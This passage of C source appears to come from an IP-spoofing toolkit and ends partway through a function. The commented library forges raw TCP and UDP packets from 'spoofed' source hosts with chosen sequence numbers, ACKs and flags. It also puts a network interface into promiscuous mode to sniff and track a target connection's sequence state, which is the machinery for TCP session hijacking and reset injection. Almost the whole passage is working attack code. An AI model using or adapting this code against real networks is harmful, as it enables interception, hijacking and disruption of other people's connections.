  7718.        /*                    TCP options (you should do the padding)             */
  7719.        /*                    data to be transmitted                              */
  7720.        /*                    (NULL is nothing)                                   */
  7721.        /*                    note that all is optional, and IP en TCP options are*/
  7722.        /*                    not often used.                                     */
  7723.        /*                    All data is put after eachother in one buffer.      */
  7724.        /*    sp_ipoptlen   : length of IP options (in bytes)                     */
  7725.        /*    sp_tcpoptlen  : length of TCP options (in bytes)                    */
  7726.        /*    sp_datalen    : amount of data to be transmitted (bytes)            */
  7727.        /*    sp_source     : spoofed host that"sends packet"                     */
  7728.        /*    sp_source_port: spoofed port that "sends packet"                    */
  7729.        /*    sp_dest       : host that should receive packet                     */
  7730.        /*    sp_dest_port  : port that should receive packet                     */
  7731.        /*    sp_seq        : sequence number of packet                           */
  7732.        /*    sp_ack        : ACK of packet                                       */
  7733.        /*    sp_flags      : flags of packet (URG,ACK,PSH,RST,SYN,FIN)           */
  7734.        /*                                                                        */
  7735.        /* void transmit_UDP (int sp_fd, char *sp_data,                           */
  7736.        /*                    int sp_ipoptlen, int sp_datalen,                    */
  7737.        /*                    char *sp_source, unsigned short sp_source_port,     */
  7738.        /*                    char *sp_dest, unsigned short sp_dest_port)         */
  7739.        /*   fire data away in an UDP packet                                      */
  7740.        /*    sp_fd         : raw socket filedesc.                                */ 
  7741.        /*    sp_data       : IP options                                          */
  7742.        /*                    data to be transmitted                              */
  7743.        /*                    (NULL if none)                                      */
  7744.        /*    sp_ipoptlen   : length of IP options (in bytes)                     */
  7745.        /*    sp_datalen    : amount of data to be transmitted                    */ 
  7746.        /*    sp_source     : spoofed host that"sends packet"                     */
  7747.        /*    sp_source_port: spoofed port that "sends packet"                    */
  7748.        /*    sp_dest       : host that should receive packet                     */
  7749.        /*    sp_dest_port  : port that should receive packet                     */
  7750.        /*                                                                        */
  7751.        /**** Receiving packets ***************************************************/
  7752.        /*                                                                        */
  7753.        /* int open_receiving (char *rc_device, char mode)                        */
  7754.        /*   Returns fdesc to a receiving socket                                  */
  7755.        /*        (if mode: IO_HANDLE don't call this twice, global var           */
  7756.        /*         rc_fd_abc123 is  initialised)                                  */
  7757.        /*     rc_device: the device to use e.g. "eth0", "ppp0"                   */
  7758.        /*                be sure to change DEV_PREFIX accordingly!               */
  7759.        /*                DEV_PREFIX is the length in bytes of the header that    */
  7760.        /*                comes with a SOCKET_PACKET due to the network device    */
  7761.        /*     mode: 0: normal mode, blocking, (read will wait till packet        */ 
  7762.        /*           comes, mind you, we are in PROMISC mode)                     */
  7763.        /*           IO_NONBLOCK: non-blocking mode (read will not wait till      */
  7764.        /*           usefull for active polling)                                  */
  7765.        /*           IO_HANDLE installs the signal handler that updates SEQ,ACK,..*/
  7766.        /*           (IO_HANDLE is not recommended to use, as it should be        */
  7767.        /*           modified according to own use, and it works bad on heavy     */
  7768.        /*           traffic continuous monitoring. I needed it once, but left it */
  7769.        /*           in to make you able to have a look at Signal handled IO,     */
  7770.        /*           personally I would have removed it, but some thought it      */
  7771.        /*           doesn't do any harm anyway, so why remove... )               */ 
  7772.        /*           (I'm not giving any more info on IO_HANDLE as it is not      */
  7773.        /*           needed for the example programs, and interested people can   */
  7774.        /*           easilythey figure the code out theirselves.)                 */
  7775.        /*           (Besides IO_HANDLE can only be called ONCE in a program,     */
  7776.        /*           other modes multiple times)                                  */ 
  7777.        /*                                                                        */
  7778.        /* int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,           */
  7779.        /*                 unsigned char *proto)                                  */
  7780.        /*        This waits for a packet (mode default) and puts it in buffer or */
  7781.        /*        returns whether there is a pack or not (IO_NONBLOCK).           */
  7782.        /*        It returns the packet length if there is one available, else 0  */
  7783.        /*                                                                        */
  7784.        /* int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,           */
  7785.        /*                  char *wp_source, unsigned short wp_source_port,       */
  7786.        /*                  char *wp_dest, unsigned short wp_dest_port,           */
  7787.        /*                  int wp_flags, int wait_time);                         */
  7788.        /*   wp_fd: a receiving socket (default or IO_NONBLOCK)                   */
  7789.        /*   ret_values: pointer to a sp_wait_packet struct, that contains SEQ,   */
  7790.        /*               ACK, flags, datalen of that packet. For further packet   */
  7791.        /*               handling see the examples.                               */
  7792.        /*                  struct sp_wait_packet  {                              */
  7793.        /*                      unsigned long seq,ack;                            */
  7794.        /*                      unsigned short flags;                             */
  7795.        /*                      int datalen;                                      */
  7796.        /*                      };                                                */
  7797.        /*   wp_source, wp_source_port : sender of packet                         */
  7798.        /*   wp_dest, wp_dest_port     : receiver of packet                       */
  7799.        /*   wp_flags: flags that should be present in packet.. (mind you there   */
  7800.        /*             could be more present, so check on return)                 */
  7801.        /*             note: if you don't care about flag, use 0                  */
  7802.        /*   wait_time: if not zero, this function will return -1 if no correct   */
  7803.        /*              packet has arrived within wait_time secs.                 */
  7804.        /*              (only works on IO_NONBLOCK socket)                        */
  7805.        /*                                                                        */
  7806.        /* void set_filter (char *f_source, unsigned short f_source_port,         */
  7807.        /*                  char *f_dest, unsigned short f_dest_port)             */
  7808.        /*        (for use with IO_HANDLE)                                        */
  7809.        /*        Start the program to watch all trafic from source/port to       */
  7810.        /*        dest/port. This enables the updating of global data. Can        */ 
  7811.        /*        be called multiple times.                                       */
  7812.        /*                                                                        */
  7813.        /* void close_receiving (void)                                            */
  7814.        /*           When opened a IO_HANDLE mode receiving socket close it with  */
  7815.        /*           this.                                                        */
  7816.        /*                                                                        */
  7817.        /**** Global DATA (IO_HANDLE mode) ****************************************/
  7818.        /*                                                                        */
  7819.        /* When accessing global data, copy the values to local vars and then use */
  7820.        /* them. Reduce access time to a minimum.                                 */
  7821.        /* Mind you use of this is very limited, if you are a novice on IO, just  */
  7822.        /* ignore it, the other functions are good enough!). If not, rewrite the  */
  7823.        /* handler for your own use...                                            */
  7824.        /*                                                                        */
  7825.        /* sig_atomic_t SP_DATA_BUSY                                              */
  7826.        /*        Put this on NON-ZERO when accesing global data. Incoming        */
  7827.        /*        packets will be ignored then, data can not be overwritten.      */
  7828.        /*                                                                        */
  7829.        /* unsigned long int CUR_SEQ, CUR_ACK;                                    */
  7830.        /*        Last recorded SEQ and ACK number of the filtered "stream".      */
  7831.        /*        Before accessing this data set SP_DATA_BUSY non-zero,           */
  7832.        /*        afterward set it back to zero.                                  */
  7833.        /*                                                                        */
  7834.        /* unsigned long int CUR_COUNT;                                           */
  7835.        /*        increased everytime other data is updated                       */
  7836.        /*                                                                        */
  7837.        /* unsigned int CUR_DATALEN;                                              */
  7838.        /*        Length of date in last TCP packet                               */
  7839.        /*                                                                        */
  7840.        /**************************************************************************/
  7841.        
  7842.        #include "sys/socket.h"       /* includes, what would we do without them  */
  7843.        #include "netdb.h"
  7844.        #include "stdlib.h"
  7845.        #include "unistd.h"
  7846.        #include "stdio.h"
  7847.        #include "errno.h"
  7848.        #include "netinet/in.h"
  7849.        #include "netinet/ip.h"
  7850.        #include "linux/if.h"
  7851.        #include "sys/ioctl.h"
  7852.        #include "sys/types.h"
  7853.        #include "signal.h"
  7854.        #include "fcntl.h"
  7855.        
  7856.        #undef  DEBUG 
  7857.        #define IP_VERSION      4                 /* keep y'r hands off...         */
  7858.        #define MTU             1500 
  7859.        #define IP_HEAD_BASE    20                /* using fixed lengths to send   */ 
  7860.        
  7861.        #define TCP_HEAD_BASE   20                /* no options etc...             */ 
  7862.        #define UDP_HEAD_BASE   8                 /* Always fixed                  */ 
  7863.        
  7864.        #define IO_HANDLE       1
  7865.        #define IO_NONBLOCK     2
  7866.        
  7867.        int DEV_PREFIX = 9999;          
  7868.        sig_atomic_t WAIT_PACKET_WAIT_TIME=0;
  7869.        
  7870.        /**** IO_HANDLE ************************************************************/
  7871.        int rc_fd_abc123;
  7872.        sig_atomic_t RC_FILTSET=0;
  7873.        char rc_filter_string[50];                       /* x.x.x.x.p-y.y.y.y.g  */
  7874.        
  7875.        sig_atomic_t SP_DATA_BUSY=0;
  7876.        unsigned long int CUR_SEQ=0, CUR_ACK=0, CUR_COUNT=0;
  7877.        unsigned int CUR_DATALEN;
  7878.        unsigned short CUR_FLAGS;
  7879.        /***************************************************************************/
  7880.        
  7881.        struct sp_wait_packet
  7882.        {
  7883.                unsigned long seq,ack;
  7884.                unsigned short flags;
  7885.                int datalen;
  7886.        };
  7887.                    
  7888.        /* Code from Sniffit - BTW my own program.... no copyright violation here */ 
  7889.        #define URG 32       /* TCP flags */
  7890.        #define ACK 16 
  7891.        #define PSH 8 
  7892.        #define RST 4
  7893.        #define SYN 2 
  7894.        #define FIN 1 
  7895.        
  7896.        struct PACKET_info
  7897.        {
  7898.                int len, datalen;       
  7899.                unsigned long int seq_nr, ACK_nr;
  7900.                u_char FLAGS;
  7901.        };
  7902.        
  7903.        struct IP_header                        /* The IPheader (without options) */
  7904.        { 
  7905.                unsigned char verlen, type;
  7906.                unsigned short length, ID, flag_offset;
  7907.                unsigned char TTL, protocol;
  7908.                unsigned short checksum;
  7909.                unsigned long int source, destination;
  7910.        };
  7911.        
  7912.        struct TCP_header                     /* The TCP header (without options) */
  7913.        {
  7914.                unsigned short source, destination;
  7915.                unsigned long int seq_nr, ACK_nr;
  7916.                unsigned short offset_flag, window, checksum, urgent;
  7917.        };
  7918.        
  7919.        struct UDP_header                                      /* The UDP header */
  7920.        {
  7921.                unsigned short source, destination;
  7922.                unsigned short length, checksum;
  7923.        };
  7924.                   
  7925.        struct pseudo_IP_header          /* The pseudo IP header (checksum calc) */ 
  7926.        {
  7927.                unsigned long int source, destination;
  7928.                char zero_byte, protocol;
  7929.                unsigned short TCP_UDP_len;
  7930.        };
  7931.        
  7932.        /* data structure for argument passing  */
  7933.        
  7934.        struct sp_data_exchange {
  7935.                int fd;                                /* Sh!t from transmit_TCP  */
  7936.                char *data; 
  7937.                int datalen;
  7938.                char *source; unsigned short source_port;
  7939.                char *dest;   unsigned short dest_port;
  7940.                unsigned long seq, ack; 
  7941.                unsigned short flags;
  7942.        
  7943.                char *buffer;               /* work buffer */
  7944.        
  7945.                int IP_optlen;             /* IP options length in bytes  */
  7946.                int TCP_optlen;            /* TCP options length in bytes */
  7947.                };
  7948.        
  7949.        /**************** all functions  *******************************************/
  7950.        void transmit_TCP (int fd, char *sp_data, 
  7951.                                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen,
  7952.                                   char *sp_source, unsigned short sp_source_port,
  7953.                                   char *sp_dest, unsigned short sp_dest_port,
  7954.                                   unsigned long sp_seq, unsigned long sp_ack, 
  7955.                                   unsigned short sp_flags);
  7956.        
  7957.        void transmit_UDP (int sp_fd, char *sp_data, 
  7958.                                   int  ipoptlen, int sp_datalen, 
  7959.                                   char *sp_source, unsigned short sp_source_port,
  7960.                                   char *sp_dest, unsigned short sp_dest_port);
  7961.        
  7962.        int get_packet (int rc_fd, char *buffer, int *, unsigned char*);
  7963.        int wait_packet(int,struct sp_wait_packet *,char *, unsigned short,char *, unsigned short, int, int);
  7964.        
  7965.        static unsigned long sp_getaddrbyname(char *);
  7966.        
  7967.        int open_sending (void);
  7968.        int open_receiving (char *, char);
  7969.        void close_receiving (void);
  7970.        
  7971.        void sp_send_packet (struct sp_data_exchange *, unsigned char);
  7972.        void sp_fix_TCP_packet (struct sp_data_exchange *);
  7973.        void sp_fix_UDP_packet (struct sp_data_exchange *);
  7974.        void sp_fix_IP_packet (struct sp_data_exchange *, unsigned char);
  7975.        unsigned short in_cksum(unsigned short *, int );
  7976.        
  7977.        void rc_sigio (int);
  7978.        void set_filter (char *, unsigned short, char *, unsigned short);
  7979.        
  7980.        /********************* let the games commence ****************************/
  7981.        
  7982.        static unsigned long sp_getaddrbyname(char *sp_name)
  7983.        {
  7984.        struct hostent *sp_he;
  7985.        int i;
  7986.        
  7987.        if(isdigit(*sp_name))
  7988.          return inet_addr(sp_name);
  7989.        
  7990.        for(i=0;i<100;i++)
  7991.             {
  7992.             if(!(sp_he = gethostbyname(sp_name)))
  7993.                {printf("WARNING: gethostbyname failure!\n");
  7994.                sleep(1);
  7995.                if(i>=3)       /* always a retry here in this kind of application */
  7996.                   printf("Coudn't resolv hostname."), exit(1);
  7997.                }
  7998.             else break;
  7999.             }
  8000.        return sp_he ? *(long*)*sp_he->h_addr_list : 0;
  8001.        }
  8002.        
  8003.        int open_sending (void)
  8004.        {
  8005.        struct protoent *sp_proto;   
  8006.        int sp_fd;
  8007.        int dummy=1;
  8008.        
  8009.        /* they don't come rawer */
  8010.        if ((sp_fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW))==-1) 
  8011.                perror("Couldn't open Socket."), exit(1);
  8012.        
  8013.        #ifdef DEBUG
  8014.                printf("Raw socket ready\n");
  8015.        #endif
  8016.        return sp_fd;
  8017.        }
  8018.        
  8019.        void sp_send_packet (struct sp_data_exchange *sp, unsigned char proto)
  8020.        {
  8021.        int sp_status;
  8022.        struct sockaddr_in sp_server;
  8023.        struct hostent *sp_help;
  8024.        int HEAD_BASE;
  8025.        
  8026.        /* Construction of destination */
  8027.        bzero((char *)&sp_server, sizeof(struct sockaddr)); 
  8028.        sp_server.sin_family = AF_INET;
  8029.        sp_server.sin_addr.s_addr = inet_addr(sp->dest); 
  8030.        if (sp_server.sin_addr.s_addr == (unsigned int)-1)
  8031.                {                      /* if target not in DOT/number notation */ 
  8032.                if (!(sp_help=gethostbyname(sp->dest))) 
  8033.                  fprintf(stderr,"unknown host %s\n", sp->dest), exit(1);
  8034.                bcopy(sp_help->h_addr, (caddr_t)&sp_server.sin_addr, sp_help->h_length);
  8035.                };
  8036.        
  8037.        switch(proto)
  8038.                {
  8039.                case 6: HEAD_BASE = TCP_HEAD_BASE;  break;                  /* TCP */
  8040.                case 17: HEAD_BASE = UDP_HEAD_BASE; break;                  /* UDP */
  8041.                default: exit(1); break;
  8042.                };
  8043.        sp_status = sendto(sp->fd, (char *)(sp->buffer), sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen, 0, 
  8044.                                (struct sockaddr *)&sp_server,sizeof(struct sockaddr)); 
  8045.        if (sp_status < 0 || sp_status != sp->datalen+HEAD_BASE+IP_HEAD_BASE+sp->IP_optlen)
  8046.                {
  8047.                if (sp_status < 0)
  8048.                  perror("Sendto"), exit(1);
  8049.                printf("hmm... Only transmitted %d of %d bytes.\n", sp_status, 
  8050.                                                        sp->datalen+HEAD_BASE);
  8051.                };
  8052.        #ifdef DEBUG
  8053.                printf("Packet transmitted...\n");
  8054.        #endif
  8055.        }
  8056.        
  8057.        void sp_fix_IP_packet (struct sp_data_exchange *sp, unsigned char proto)
  8058.        { 
  8059.        struct IP_header *sp_help_ip;
  8060.        int HEAD_BASE;
  8061.        
  8062.        switch(proto)
  8063.                {
  8064.                case 6: HEAD_BASE = TCP_HEAD_BASE;  break;                  /* TCP */
  8065.                case 17: HEAD_BASE = UDP_HEAD_BASE; break;                  /* UDP */
  8066.                default: exit(1); break;
  8067.                };
  8068.        
  8069.        sp_help_ip = (struct IP_header *) (sp->buffer);
  8070.        sp_help_ip->verlen = (IP_VERSION << 4) | ((IP_HEAD_BASE+sp->IP_optlen)/4);
  8071.        sp_help_ip->type = 0;
  8072.        sp_help_ip->length = htons(IP_HEAD_BASE+HEAD_BASE+sp->datalen+sp->IP_optlen+sp->TCP_optlen);
  8073.        sp_help_ip->ID = htons(12545);                                  /* TEST */ 
  8074.        sp_help_ip->flag_offset = 0;
  8075.        sp_help_ip->TTL = 69;
  8076.        sp_help_ip->protocol = proto;
  8077.        sp_help_ip->source = sp_getaddrbyname(sp->source);
  8078.        sp_help_ip->destination =  sp_getaddrbyname(sp->dest);
  8079.        sp_help_ip->checksum=in_cksum((unsigned short *) (sp->buffer), 
  8080.                                                        IP_HEAD_BASE+sp->IP_optlen);
  8081.        #ifdef DEBUG
  8082.                printf("IP header fixed...\n");
  8083.        #endif
  8084.        }
  8085.        
  8086.        void sp_fix_TCP_packet (struct sp_data_exchange *sp)
  8087.        { 
  8088.        char sp_pseudo_ip_construct[MTU];
  8089.        struct TCP_header *sp_help_tcp;
  8090.        struct pseudo_IP_header *sp_help_pseudo;
  8091.        int i;
  8092.        
  8093.        for(i=0;i<MTU;i++)
  8094.          {sp_pseudo_ip_construct[i]=0;}
  8095.        
  8096.        sp_help_tcp = (struct TCP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  8097.        sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;
  8098.        
  8099.        sp_help_tcp->offset_flag = htons( (((TCP_HEAD_BASE+sp->TCP_optlen)/4)<<12) | sp->flags); 
  8100.        sp_help_tcp->seq_nr = htonl(sp->seq);
  8101.        sp_help_tcp->ACK_nr = htonl(sp->ack);
  8102.        sp_help_tcp->source = htons(sp->source_port);
  8103.        sp_help_tcp->destination = htons(sp->dest_port);
  8104.        sp_help_tcp->window = htons(0x7c00);             /* dummy for now 'wujx' */
  8105.        
  8106.        sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  8107.        sp_help_pseudo->destination =  sp_getaddrbyname(sp->dest);
  8108.        sp_help_pseudo->zero_byte = 0;
  8109.        sp_help_pseudo->protocol = 6;
  8110.        sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+TCP_HEAD_BASE+sp->TCP_optlen);
  8111.        
  8112.        memcpy(sp_pseudo_ip_construct+12, sp_help_tcp, sp->TCP_optlen+sp->datalen+TCP_HEAD_BASE);
  8113.        sp_help_tcp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, 
  8114.                                          sp->datalen+12+TCP_HEAD_BASE+sp->TCP_optlen);
  8115.        #ifdef DEBUG
  8116.                printf("TCP header fixed...\n");
  8117.        #endif
  8118.        }
  8119.        
  8120.        void transmit_TCP (int sp_fd, char *sp_data, 
  8121.                                   int sp_ipoptlen, int sp_tcpoptlen, int sp_datalen, 
  8122.                                   char *sp_source, unsigned short sp_source_port,
  8123.                                   char *sp_dest, unsigned short sp_dest_port,
  8124.                                   unsigned long sp_seq, unsigned long sp_ack, 
  8125.                                   unsigned short sp_flags)
  8126.        {
  8127.        char sp_buffer[1500];
  8128.        struct sp_data_exchange sp_struct;
  8129.        
  8130.        bzero(sp_buffer,1500);
  8131.        if (sp_ipoptlen!=0) 
  8132.                memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  8133.        
  8134.        if (sp_tcpoptlen!=0) 
  8135.                memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen,
  8136.                                                    sp_data+sp_ipoptlen,sp_tcpoptlen);
  8137.        if (sp_datalen!=0) 
  8138.                memcpy(sp_buffer+IP_HEAD_BASE+TCP_HEAD_BASE+sp_ipoptlen+sp_tcpoptlen,
  8139.                                sp_data+sp_ipoptlen+sp_tcpoptlen,sp_datalen);
  8140.        
  8141.        sp_struct.fd          = sp_fd; 
  8142.        sp_struct.data        = sp_data;
  8143.        sp_struct.datalen     = sp_datalen;
  8144.        sp_struct.source      = sp_source;
  8145.        sp_struct.source_port = sp_source_port;
  8146.        sp_struct.dest        = sp_dest;
  8147.        sp_struct.dest_port   = sp_dest_port;
  8148.        sp_struct.seq         = sp_seq;
  8149.        sp_struct.ack         = sp_ack;
  8150.        sp_struct.flags       = sp_flags;
  8151.        sp_struct.buffer      = sp_buffer;
  8152.        sp_struct.IP_optlen   = sp_ipoptlen;          
  8153.        sp_struct.TCP_optlen  = sp_tcpoptlen;          
  8154.        
  8155.        sp_fix_TCP_packet(&sp_struct);
  8156.        sp_fix_IP_packet(&sp_struct, 6);
  8157.        sp_send_packet(&sp_struct, 6);
  8158.        }
  8159.        
  8160.        void sp_fix_UDP_packet (struct sp_data_exchange *sp)
  8161.        { 
  8162.        char sp_pseudo_ip_construct[MTU];
  8163.        struct UDP_header *sp_help_udp;
  8164.        struct pseudo_IP_header *sp_help_pseudo;
  8165.        int i;
  8166.        
  8167.        for(i=0;i<MTU;i++)
  8168.          {sp_pseudo_ip_construct[i]=0;}
  8169.        
  8170.        sp_help_udp = (struct UDP_header *) (sp->buffer+IP_HEAD_BASE+sp->IP_optlen);
  8171.        sp_help_pseudo = (struct pseudo_IP_header *) sp_pseudo_ip_construct;
  8172.        
  8173.        sp_help_udp->source = htons(sp->source_port);
  8174.        sp_help_udp->destination = htons(sp->dest_port);
  8175.        sp_help_udp->length =  htons(sp->datalen+UDP_HEAD_BASE);
  8176.        
  8177.        sp_help_pseudo->source = sp_getaddrbyname(sp->source);
  8178.        sp_help_pseudo->destination =  sp_getaddrbyname(sp->dest);
  8179.        sp_help_pseudo->zero_byte = 0;
  8180.        sp_help_pseudo->protocol = 17;
  8181.        sp_help_pseudo->TCP_UDP_len = htons(sp->datalen+UDP_HEAD_BASE);
  8182.        
  8183.        memcpy(sp_pseudo_ip_construct+12, sp_help_udp, sp->datalen+UDP_HEAD_BASE);
  8184.        sp_help_udp->checksum=in_cksum((unsigned short *) sp_pseudo_ip_construct, 
  8185.                                                             sp->datalen+12+UDP_HEAD_BASE);
  8186.        #ifdef DEBUG
  8187.                printf("UDP header fixed...\n");
  8188.        #endif
  8189.        }
  8190.        
  8191.        void transmit_UDP (int sp_fd, char *sp_data, 
  8192.                                   int sp_ipoptlen, int sp_datalen, 
  8193.                                   char *sp_source, unsigned short sp_source_port,
  8194.                                   char *sp_dest, unsigned short sp_dest_port)
  8195.        {
  8196.        char sp_buffer[1500];
  8197.        struct sp_data_exchange sp_struct;
  8198.        
  8199.        bzero(sp_buffer,1500);
  8200.        
  8201.        if (sp_ipoptlen!=0) 
  8202.                memcpy(sp_buffer+IP_HEAD_BASE,sp_data,sp_ipoptlen);
  8203.        if (sp_data!=NULL) 
  8204.                memcpy(sp_buffer+IP_HEAD_BASE+UDP_HEAD_BASE+sp_ipoptlen,
  8205.                                                     sp_data+sp_ipoptlen,sp_datalen);
  8206.        sp_struct.fd          = sp_fd; 
  8207.        sp_struct.data        = sp_data;
  8208.        sp_struct.datalen     = sp_datalen;
  8209.        sp_struct.source      = sp_source;
  8210.        sp_struct.source_port = sp_source_port;
  8211.        sp_struct.dest        = sp_dest;
  8212.        sp_struct.dest_port   = sp_dest_port;
  8213.        sp_struct.buffer      = sp_buffer;
  8214.        sp_struct.IP_optlen   = sp_ipoptlen;
  8215.        sp_struct.TCP_optlen  = 0;
  8216.        
  8217.        sp_fix_UDP_packet(&sp_struct);
  8218.        sp_fix_IP_packet(&sp_struct, 17);
  8219.        sp_send_packet(&sp_struct, 17);
  8220.        }
  8221.        
  8222.        /* This routine stolen from ping.c -- HAHAHA!*/
  8223.        unsigned short in_cksum(unsigned short *addr,int len)
  8224.        {
  8225.        register int nleft = len;
  8226.        register unsigned short *w = addr;
  8227.        register int sum = 0;
  8228.        unsigned short answer = 0;
  8229.                
  8230.        while (nleft > 1)
  8231.                { 
  8232.                sum += *w++;
  8233.                nleft -= 2;
  8234.                }
  8235.        if (nleft == 1)
  8236.                {
  8237.                *(u_char *)(&answer) = *(u_char *)w ;
  8238.                sum += answer;
  8239.                }
  8240.        sum = (sum >> 16) + (sum & 0xffff);
  8241.        sum += (sum >> 16);
  8242.        answer = ~sum;
  8243.        return(answer);
  8244.        }
  8245.        
  8246.        /************************* Receiving department  ****************************/
  8247.        
  8248.        int open_receiving (char *rc_device, char mode)
  8249.        {
  8250.        int or_fd;
  8251.        struct sigaction rc_sa;
  8252.        int fcntl_flag;
  8253.        struct ifreq ifinfo;
  8254.        char test;
  8255.        
  8256.        /* create snoop socket and set interface promisc */
  8257.        if ((or_fd = socket(AF_INET, SOCK_PACKET, htons(0x3)))==-1) 
  8258.                perror("Couldn't open Socket."), exit(1);
  8259.        strcpy(ifinfo.ifr_ifrn.ifrn_name,rc_device);
  8260.        if(ioctl(or_fd,SIOCGIFFLAGS,&ifinfo)<0)
  8261.                perror("Couldn't get flags."), exit(1);
  8262.        ifinfo.ifr_ifru.ifru_flags |= IFF_PROMISC;
  8263.        if(ioctl(or_fd,SIOCSIFFLAGS,&ifinfo)<0)
  8264.                perror("Couldn't set flags. (PROMISC)"), exit(1);
  8265.        
  8266.        if(mode&IO_HANDLE)
  8267.                {               /* install handler */
  8268.                rc_sa.sa_handler=rc_sigio;        /* we don't use signal()        */
  8269.                sigemptyset(&rc_sa.sa_mask);      /* because the timing window is */
  8270.                rc_sa.sa_flags=0;                 /* too big...                   */
  8271.                sigaction(SIGIO,&rc_sa,NULL);
  8272.                }
  8273.        
  8274.        if(fcntl(or_fd,F_SETOWN,getpid())<0)
  8275.                perror("Couldn't set ownership"), exit(1);
  8276.        
  8277.        if(mode&IO_HANDLE)
  8278.                {
  8279.                if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
  8280.                        perror("Couldn't get FLAGS"), exit(1);
  8281.                if(fcntl(or_fd,F_SETFL,fcntl_flag|FASYNC|FNDELAY)<0)
  8282.                        perror("Couldn't set FLAGS"), exit(1);
  8283.                rc_fd_abc123=or_fd;
  8284.                }
  8285.        else 
  8286.                {
  8287.                if(mode&IO_NONBLOCK)
  8288.                        {
  8289.                        if( (fcntl_flag=fcntl(or_fd,F_GETFL,0))<0)
  8290.                                perror("Couldn't get FLAGS"), exit(1);
  8291.                        if(fcntl(or_fd,F_SETFL,fcntl_flag|FNDELAY)<0)
  8292.                                perror("Couldn't set FLAGS"), exit(1);
  8293.                        };
  8294.                };
  8295.        
  8296.        #ifdef DEBUG
  8297.                printf("Reading socket ready\n");
  8298.        #endif
  8299.        return or_fd;
  8300.        }
  8301.        
  8302.        /* returns 0 when no packet read!  */
  8303.        int get_packet (int rc_fd, char *buffer, int *TCP_UDP_start,unsigned  char *proto) 
  8304.        {
  8305.        char help_buffer[MTU];
  8306.        int pack_len;
  8307.        struct IP_header *gp_IPhead;
  8308.        
  8309.        pack_len = read(rc_fd,help_buffer,1500);
  8310.        if(pack_len<0)
  8311.                {
  8312.                if(errno==EWOULDBLOCK) 
  8313.                        {pack_len=0;}
  8314.                else
  8315.                        {perror("Read error:"); exit(1);}
  8316.                };
  8317.        if(pack_len>0)
  8318.                {
  8319.                pack_len -= DEV_PREFIX;
  8320.                memcpy(buffer,help_buffer+DEV_PREFIX,pack_len);
  8321.                gp_IPhead = (struct IP_header *) buffer;
  8322.                if(proto != NULL)
  8323.                        *proto = gp_IPhead->protocol;
  8324.                if(TCP_UDP_start != NULL)
  8325.                        *TCP_UDP_start = (gp_IPhead->verlen & 0xF) << 2;
  8326.                }
  8327.        return pack_len;
  8328.        }
  8329.        
  8330.        void wait_packet_timeout (int sig)
  8331.        {
  8332.        alarm(0);
  8333.        WAIT_PACKET_WAIT_TIME=1;
  8334.        }
  8335.        
  8336.        int wait_packet(int wp_fd,struct sp_wait_packet *ret_values,
  8337.                        char *wp_source, unsigned short wp_source_port,
  8338.                        char *wp_dest, unsigned short wp_dest_port, int wp_flags, 
  8339.                        int wait_time) 
  8340.        {
  8341.        char wp_buffer[1500];
  8342.        struct IP_header *wp_iphead;
  8343.        struct TCP_header *wp_tcphead;
  8344.        unsigned long wp_sourcel, wp_destl;
  8345.        int wp_tcpstart;
  8346.        char wp_proto;
  8347.        
  8348.        wp_sourcel=sp_getaddrbyname(wp_source);
  8349.        wp_destl=sp_getaddrbyname(wp_dest);
  8350.        
  8351.        WAIT_PACKET_WAIT_TIME=0;
  8352.        if(wait_time!=0)
  8353.                {
  8354.                signal(SIGALRM,wait_packet_timeout);
  8355.                alarm(wait_time);
  8356.                }       
  8357.        
  8358.        while(1)
  8359.          {
  8360.          while(get_packet(wp_fd, wp_buffer, &wp_tcpstart, &wp_proto)<=0) 
  8361.                {
  8362.                if (WAIT_PACKET_WAIT_TIME!=0)   {alarm(0); return -1;}
  8363.                };
  8364.          if(wp_proto == 6)
  8365.            {
  8366.            wp_iphead= (struct IP_header *) wp_buffer;
  8367.            wp_tcphead= (struct TCP_header *) (wp_buffer+wp_tcpstart);
  8368.            if( (wp_sourcel==wp_iphead->source)&&(wp_destl==wp_iphead->destination) )
  8369.              {
  8370.              if( (ntohs(wp_tcphead->source)==wp_source_port) &&
  8371.                                       (ntohs(wp_tcphead->destination)==wp_dest_port) )
  8372.                {
  8373.                if( (wp_flags==0) || (ntohs(wp_tcphead->offset_flag)&wp_flags) )
  8374.                  {
  8375.                  ret_values->seq=ntohl(wp_tcphead->seq_nr);
  8376.                  ret_values->ack=ntohl(wp_tcphead->ACK_nr);
  8377.                  ret_values->flags=ntohs(wp_tcphead->offset_flag)&
  8378.                                                        (URG|ACK|PSH|FIN|RST|SYN);
  8379.                  ret_values->datalen = ntohs(wp_iphead->length) -            
  8380.                                   ((wp_iphead->verlen & 0xF) << 2) -
  8381.                                    ((ntohs(wp_tcphead->offset_flag) & 0xF000) >> 10);
  8382.                  alarm(0);
  8383.                  return 0;
  8384.                  }
  8385.                }
  8386.              }
  8387.            }
  8388.          }
  8389.        /*impossible to get here.. but anyways*/
  8390.        alarm(0); return -1;
  8391.        }
  8392.        
  8393.        
  8394.        void close_receiving (void)
  8395.        {
  8396.        close(rc_fd_abc123);
  8397.        }
  8398.        
  8399.        void rc_sigio (int sig)                     /* Packet handling routine */
  8400.        {
  8401.        char rc_buffer[1500];
  8402.        char packet_id [50];
  8403.        unsigned char *rc_so, *rc_dest;
  8404.        struct IP_header *rc_IPhead;
  8405.        struct TCP_header *rc_TCPhead;
  8406.        int pack_len;
  8407.        
  8408.        if(RC_FILTSET==0) return;
  8409.        
  8410.        if(SP_DATA_BUSY!=0)              /* skip this packet */
  8411.                return;     
  8412.        
  8413.        pack_len = read(rc_fd_abc123,rc_buffer,1500);
  8414.        rc_IPhead = (struct IP_header *) (rc_buffer + DEV_PREFIX);
  8415.        if(rc_IPhead->protocol!=6) return;                          /* if not TCP */
